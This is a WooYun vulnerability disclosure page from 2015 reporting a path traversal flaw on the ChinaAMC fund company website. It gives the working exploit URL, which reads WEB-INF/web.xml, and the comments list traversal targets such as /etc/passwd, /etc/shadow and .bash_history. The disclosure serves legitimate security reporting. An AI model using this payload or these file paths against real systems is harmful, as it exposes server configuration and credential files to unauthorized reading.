当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106841

漏洞标题:华夏基金主站文件遍历

相关厂商:华夏基金

漏洞作者: 大懒

提交时间:2015-04-09 16:17

修复时间:2015-05-24 17:14

公开时间:2015-05-24 17:14

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-09: 细节已通知厂商并且等待厂商处理中
2015-04-09: 厂商已经确认,细节仅向厂商公开
2015-04-19: 细节向核心白帽子及相关领域专家公开
2015-04-29: 细节向普通白帽子公开
2015-05-09: 细节向实习白帽子公开
2015-05-24: 细节向公众公开

简要描述:

华夏基金主站目录遍历,可通过该漏洞获取系统结构或者一些敏感信息

详细说明:

URL:http://www.chinaamc.com/portal/cn/second_login.jsp?categoty_link=../../WEB-INF/web.xml%3f&column=1246275754100&link_page=http://www.chinaamc.com/portal/cn/second.jsp&minisite_column=1208583703100
参数:categoty_link

1.png


漏洞证明:

1.一些路径

2.png


2.一些配置文件

3.png


3.一些系统路径

4.png


4.查看部分配置文件

5.png


6.png

修复方案:

权限控制

版权声明:转载请注明来源 大懒@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-04-09 17:13

厂商回复:

非常感谢找出我们网站安全漏洞!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-24 20:57 | 成语 ( 路人 | Rank:2 漏洞数:3 | Null)

    很好奇,像目录遍历这种洞是怎么找到的?

  2. 2015-05-25 08:37 | 大懒 ( 普通白帽子 | Rank:239 漏洞数:45 )

    @成语 扫可以,人工看的话一般来说是找调用文件路径的参数值来看

  3. 2015-05-25 19:17 | 成语 ( 路人 | Rank:2 漏洞数:3 | Null)

    @大懒 非常感谢

  4. 2015-09-25 15:09 | 尊-折戟 ( 实习白帽子 | Rank:53 漏洞数:17 | 与时俱进!=忘本)

    @大懒 像文件遍历怎么确定一个网址的参数就是这个,而且像文件遍历有一些什么语句,像../etc/passwd, ../etc/shadow,../../WEB-INF/之类的还有什么!

  5. 2015-09-25 20:33 | 大懒 ( 普通白帽子 | Rank:239 漏洞数:45 )

    @尊-折戟 一般调用路径的参数都可以试一下,比如参数值用到../这样的参数。然后你所谓的语句是看需要,不同的系统都不一眼,而一般使用/etc/passwd只是为了证明。相关的有很多比如/.bash_history